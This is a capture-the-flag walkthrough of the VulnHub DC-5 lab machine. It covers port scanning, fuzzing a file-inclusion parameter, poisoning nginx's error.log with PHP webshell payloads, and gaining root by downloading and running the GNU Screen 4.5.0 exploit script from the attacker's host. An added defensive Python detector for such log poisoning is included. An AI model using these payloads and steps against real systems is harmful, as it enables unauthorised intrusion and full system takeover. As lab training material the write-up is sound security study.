
[vulnhub]DC: 5

https://www.vulnhub.com/entry/dc-5,314/

Host discovery and port scanning

  1. Probe for live hosts; .175 is the target

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.175
    Host is up (0.00016s latency).
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. Scan all open ports on the target

    nmap -sT -min-rate 10000 -p- 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00040s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    80/tcp    open  http
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    
  3. Scan service versions and the OS version

    nmap -sV -sT -O -p80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00047s latency).
    
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    nginx 1.6.2
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    57203/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
  4. Scan for vulnerabilities

    nmap -script=vuln -p 80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00052s latency).
    
    PORT      STATE SERVICE
    80/tcp    open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf:
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
    |   Found the following possible CSRF vulnerabilities:
    |
    |     Path: http://192.168.75.175:80/contact.php
    |     Form id: fname
    |_    Form action: thankyou.php
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    

    Nothing substantive here, so as usual we start with port 80.

Web penetration

  1. Visit the home page


  2. Enumerate directories; nothing worth attention

    dirsearch -u 192.168.75.175 -x 403
    //
    [13:40:35] Starting:
    [13:40:56] 200 -    4KB - /contact.php
    [13:40:56] 301 -  184B  - /css  ->  http://192.168.75.175/css/
    [13:41:00] 200 -    6KB - /faq.php
    [13:41:01] 200 -   17B  - /footer.php
    [13:41:03] 301 -  184B  - /images  ->  http://192.168.75.175/images/
    [13:41:25] 200 -  852B  - /thankyou.php
    
  3. Look at the hint on the official page: this particular entry point may be hard to identify, but it does exist. You need to look for something unusual (something that changes when the page is refreshed). We notice that the year in the footer changes on every submission.


    The entry point may be in the footer.

  4. Visiting /footer.php and refreshing repeatedly also changes the year, so the thankyou page includes footer.php. There may be a parameter that controls which file is included; use wfuzz to fuzz out the parameter name.

    # Try to include /etc/passwd
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
    Total requests: 3024
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================
    
    000001053:   200        70 L     104 W      2319 Ch     "file"
    
    

    The fuzzed-out parameter is file, which is probably used to include files; /etc/passwd is included successfully.


  5. Since there is no login page, including /etc/passwd is of no use; following the usual CTF approach, we try including log files.

    /thankyou.php?file=/var/log/nginx/access.log
    

    Included successfully!

  6. After some attempts, inserting PHP code via the User-Agent did not work. In the end, we can put PHP code after the file parameter so that it causes an error, leaving the statement in error.log.

    (From here on the target IP changes to 176; messing around earlier broke the previous target.)

    http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
    

    Include error.log; <?php @eval($_POST['b']); ?> is present, and that is enough.

    2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning:  include(<?php @eval($_POST['b']); ?>): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
    PHP message: PHP Warning:  include(): Failed opening '<?php @eval($_POST['b']); ?>' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"
    

    Connect with AntSword (the password is b, depending on your POST parameter), then open a terminal in AntSword and spawn a reverse shell.
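    Defender-side counterpart to steps 4 to 6, as an added example that is not part of the original write-up: the include() warnings that LFI and log-poisoning attempts leave in nginx's error.log (the format quoted above) are parsed and each failed include target is flagged for PHP open tags, path traversal and sensitive paths. The sample lines, timestamps and client addresses are constructed; the first one is modelled on the entry in the write-up.

```python
import re

# Constructed error.log lines modelled on the entry quoted above (clients/timestamps are made up).
SAMPLE_ERROR_LOG = [
    '2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning:  '
    "include(<?php @eval($_POST['b']); ?>): failed to open stream: No such file or directory in "
    '/var/www/html/thankyou.php on line 44", client: 192.168.75.1, request: "GET /thankyou.php?file= HTTP/1.1"',
    '2024/11/03 04:40:01 [error] 557#0: *70 FastCGI sent in stderr: "PHP message: PHP Warning:  '
    "include(../../../../etc/shadow): failed to open stream: Permission denied in "
    '/var/www/html/thankyou.php on line 44", client: 10.0.0.7, request: "GET /thankyou.php?file=../../../../etc/shadow HTTP/1.1"',
    '2024/11/03 04:41:10 [error] 557#0: *71 FastCGI sent in stderr: "PHP message: PHP Warning:  '
    "include(footer.php): failed to open stream: No such file or directory in "
    '/var/www/html/thankyou.php on line 44", client: 10.0.0.9, request: "GET /thankyou.php?file=footer.php HTTP/1.1"',
]

INCLUDE_RE = re.compile(r"include\((.*?)\): failed to open stream")   # what PHP tried to include
CLIENT_RE = re.compile(r"client: ([\d.:a-fA-F]+)")
REQUEST_RE = re.compile(r'request: "(.*?)"')
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)             # <?php or <?= inside the target
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")                      # ../ segments
SENSITIVE_RE = re.compile(r"^/(?:etc|var/log|proc)/")                  # typical LFI read targets

def classify_include_target(target):
    """Indicator names that apply to one include() target (empty list = benign)."""
    indicators = []
    if PHP_TAG_RE.search(target):
        indicators.append("php_tag")         # poisoning payload being written into the log
    if TRAVERSAL_RE.search(target):
        indicators.append("traversal")       # climbing out of the web root
    if SENSITIVE_RE.search(target):
        indicators.append("sensitive_path")  # reads of /etc, /var/log, /proc
    elif target.startswith("/"):
        indicators.append("absolute_path")   # any other absolute path
    return indicators

def scan_error_log(lines):
    """Return one finding per nginx error.log line whose include() target looks like LFI."""
    findings = []
    for line in lines:
        m = INCLUDE_RE.search(line)
        indicators = classify_include_target(m.group(1)) if m else []
        if not indicators:
            continue
        client, request = CLIENT_RE.search(line), REQUEST_RE.search(line)
        findings.append({"client": client.group(1) if client else None,
                         "request": request.group(1) if request else None,
                         "target": m.group(1), "indicators": indicators})
    return findings
```

    The same classifier can be run over the file parameter of access.log requests; the page-level fix is to include only names from a fixed allow-list (here just footer.php) instead of the raw parameter.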


Privilege escalation

  1. Check privileges

    (www-data:/var/www) $ whoami
    www-data
    (www-data:/var/www) $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    (www-data:/var/www) $ uname -a
    Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
    
  2. Look for sensitive files

    (www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
    /bin/su
    /bin/mount
    /bin/umount
    /bin/screen-4.5.0
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/at
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/sbin/exim4
    /sbin/mount.nfs
    

    Found screen-4.5.0

  3. Check whether screen-4.5.0 has a known privilege-escalation vulnerability

    searchsploit screen 4.5.0
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                                                                   |  Path
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                    | linux/local/41154.sh
    GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                                                                                              | linux/local/41152.txt
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    

    Grab linux/local/41154.sh and download it onto the target

  4. Run the script

    $ wget http://192.168.75.151/41154.sh
    converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
    --2024-11-03 05:11:00--  http://192.168.75.151/41154.sh
    Connecting to 192.168.75.151:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1149 (1.1K) [application/x-sh]
    Saving to: '41154.sh'
    
    41154.sh            100%[=====================>]   1.12K  --.-KB/s   in 0s
    
    2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]
    //
    $ chmod u+x 41154.sh
    //
    $ ./41154.sh
    ~ gnu/screenroot ~
    [+] First, we create our shell and library...
    [+] Now we create our /etc/ld.so.preload file...
    [+] Triggering...
    ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
    [+] done!
    No Sockets found in /tmp/screens/S-www-data.
    
    # id
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    # whoiam
    whoiam
    sh: 2: whoiam: not found
    # whoami
    whoami
    root
    

    Privilege escalation succeeded; read the flag file

    # cat thisistheflag.txt
    cat thisistheflag.txt
    
    888b    888 d8b                                                      888      888 888 888
    8888b   888 Y8P                                                      888      888 888 888
    88888b  888                                                          888      888 888 888
    888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
    888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
    888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
    888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
    888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888
    
    Once again, a big thanks to all those who do these little challenges,
    and especially all those who give me feedback - again, it's all greatly
    appreciated.  :-)
    
    I also want to send a big thanks to all those who find the vulnerabilities
    and create the exploits that make these challenges possible.
    
    

http://www.kler.cn/a/382201.html
